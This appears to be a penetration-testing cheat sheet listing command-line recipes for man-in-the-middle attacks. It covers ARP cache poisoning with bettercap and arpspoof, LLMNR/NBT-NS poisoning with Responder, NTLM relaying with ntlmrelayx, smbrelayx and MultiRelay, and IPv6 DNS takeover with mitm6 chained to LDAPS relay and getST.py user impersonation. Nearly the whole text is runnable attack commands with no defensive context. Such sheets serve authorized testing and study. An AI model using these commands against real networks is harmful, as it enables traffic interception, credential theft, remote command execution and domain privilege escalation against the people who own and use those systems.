# Man-in-the-Middle

## ARP Cache Poisoning

Bettercap2

```
arp.spoof on
```

Arpspoof

```
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
```

## LLMNR/NBT-NS Poisoning and SMB Relay

### Responder

Remember to start with these servers turned off in `Responder.conf`:

```
SMB = Off     # Turn this off
HTTP = Off    # Turn this off
```

```
responder -I eth0 -rv
```

```
responder -I eth0 -r -d -w
```

### Relay

#### ntlmrelayx

```
cme smb <CIDR> --gen-relay-list targets.txt
```

```
ntlmrelayx.py -tf targets.txt
```

#### smbrelayx

```
smbrelayx.py -h <target_IP> -c "ipconfig"
```

#### MultiRelay

```
python MultiRelay.py -t <IP target> -u ALL
```

### mitm6

```
mitm6 -d example.local --ignore-nofqdn
```

Relay

```
ntlmrelayx.py -6 -t ldaps://example.local --delegate-access --no-smb-server -wh test-wpad
```

Exploit

```
getST.py -spn cifs/example.local example.local/ADDED_PC\$ -impersonate TARGET_USER
```

### InveighZero

Works from Windows systems:

* <https://github.com/Kevin-Robertson/InveighZero>
